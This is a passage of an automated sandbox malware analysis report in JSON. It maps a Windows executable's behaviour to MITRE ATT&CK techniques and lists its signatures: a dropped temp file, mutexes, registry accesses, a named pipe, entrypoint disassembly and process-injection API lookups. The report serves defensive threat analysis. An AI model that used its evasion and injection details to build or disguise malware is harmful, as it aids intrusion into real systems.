"attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mojpivf.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75470000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 75030000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00005992)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"mojpivf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67EE4FF1.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"mojpivf.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"DISMHOST.EXE.67EE4FF1.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called 